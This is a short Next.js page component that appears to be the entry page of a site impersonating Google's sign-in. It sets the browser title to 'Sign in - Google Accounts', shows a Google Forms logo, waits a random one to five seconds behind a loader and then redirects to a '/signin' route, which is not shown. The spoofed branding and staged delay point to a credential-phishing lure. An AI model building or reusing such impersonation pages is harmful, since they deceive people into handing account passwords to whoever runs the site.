import { type NextPage } from "next";
import Head from "next/head";
import Image from "next/image";
import { useRouter } from "next/router";
import { useEffect, useState } from "react";
import Loader from "~/components/loader";
const Home: NextPage = () => {
  const router = useRouter();
  const [loading, setLoading] = useState(true);
  useEffect(() => {
    if (!router.isReady) return;
    const randomNumber = Math.floor(Math.random() * 5) + 1;
    setTimeout(() => {
      setLoading(false);
      void router.push("/signin");
    }, randomNumber * 1000);
  }, [router]);
  return (
    <>
      <Head>
        <title>Sign in - Google Accounts</title>
        <meta name="description" content="Generated by create-t3-app" />
        <link rel="icon" href="/favicon.ico" />
      </Head>
      <main className="flex min-h-screen flex-col items-center justify-center border text-center">
        <Image
          src={"/img/google-forms-logo.png"}
          alt="Google Forms logo"
          width={50}
          height={50}
        />
        <div className="mt-10">
          {loading ? <Loader /> : <p>Redirecting...</p>}
        </div>
      </main>
    </>
  );
};

export default Home;
